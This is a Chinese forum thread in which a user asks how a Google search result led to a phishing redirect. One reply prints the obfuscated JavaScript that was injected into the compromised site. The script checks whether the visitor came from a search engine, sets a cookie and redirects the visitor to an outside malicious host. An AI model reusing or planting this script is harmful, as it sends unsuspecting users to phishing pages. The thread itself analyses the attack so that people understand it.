这是一个创建于 2052 天前的主题,其中的信息可能已经有所发展或是发生改变。
手动重现
- Google 搜索 notion dropbox paper: https://www.google.com/search?q=notion+dropbox+paper
- 然后点结果中的这个钓鱼链接: http://staging.swisse.com.au/dropbox-paper.html
- 几次跳转后:
录了个 Gif: https://i.imgur.com/KnY04hA.gifv
问题
- 为什么直接访问这个钓鱼页就不会被钓鱼?通过 refer 判断的吗?
- 在 Google 搜索结果页点击才会被钓鱼(不对,好像是只要有 refer 都行),如果直接访问是正常显示的 notion vs dropbox peper 的一篇东拼西凑的文章。
- 哪个环节出的问题?
- 应该就是 swisse.com.au 被挂了这个钓鱼页吧?
- 或者 HTTP 被篡改?(但访问 swisse.com.au 人家有 HTTPS 呀)
- 我装的某个 Chrome 插件有问题?
- 或者是我用的代理?
其他网站上(特别是各种色情网站)遇到钓鱼链接倒不稀奇,但在 google.com 上遇到且 Chrome 还没红屏警告的,这是第一次碰到。
一知半解,有大佬分析一下吗?
 | 1 xylxsss 2020-03-06 15:48:00 +08:00 路由器被劫持了吧。 |
 | 2 imdong 2020-03-06 16:03:58 +08:00 不是劫持,就是典型的黑产 SEO 性质的东西。 页面加载了唯一 JS ( http://staging.swisse.com.au/js/stats.js) ```Javascript class Task2 { static ["com2"]() { var _0x4014c2 = document.title.split(" - "); var _0x28236f = _0x4014c2[0].split(" | "); function _0x19737c(_0x3c4e45, _0x1f88c8, _0x43a6f0, _0x17db9b, _0x142f63, _0x1a5f1a) { if (!_0x3c4e45 || !_0x1f88c8) return ![]; var _0x3405ea = _0x3c4e45 + '=' + encodeURIComponent(_0x1f88c8); if (_0x43a6f0) _0x3405ea += "; expires=" + _0x43a6f0.toGMTString(); if (_0x17db9b) _0x3405ea += ';\x20path=' + _0x17db9b; if (_0x142f63) _0x3405ea += "; domain=" + _0x142f63; if (_0x1a5f1a) _0x3405ea += "; secure"; document.cookie = _0x3405ea; return !![]; } function _0x49f35b(_0x3b366b) { var _0x2d3ad0 = "(?:; )?" + _0x3b366b + '=([^;]*);?'; var _0x5ede30 = new RegExp(_0x2d3ad0); if (_0x5ede30.test(document.cookie)) return decodeURIComponent(RegExp.$1); return ![]; } function _0x35790f(_0xe10d12, _0x1aca07, _0x43ad37) { _0x19737c(_0xe10d12, null, new Date(0), _0x1aca07, _0x43ad37); return !![]; } var _0x5e520f = {}; _0x5e520f.searchers = [[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]]; _0x5e520f.sp_redirect = function (_0xa5e498) { var _0x50a397 = null; for (var _0x592205 = 0; _0x592205 < _0x5e520f.searchers['length']; _0x592205++) { var _0x5da909 = _0x5e520f.searchers[_0x592205]; if (_0xa5e498.match(_0x5da909[0]) || _0x49f35b("opos") == '1') { _0x19737c("opos", '1'); document.location['href'] = "http://tr.stoneshards.ru/trds?q=" + _0x28236f[0]; break; } } }; _0x5e520f.sp_redirect(document.referrer); } } Task2.com2(); ``` 只要是来路 referrer 是来自 _0x5e520f.searchers 数组内的网站,就跳转到 tr#stoneshards#ru/trds?q={title} |
| 3 imdong 2020-03-06 16:06:37 +08:00 对了,多刷新几次,每次都有新感觉。 |
 | 4 Dreax 2020-03-06 19:27:40 +08:00 是劫持 我这儿直接打开和走梯子都没问题 |
Select Language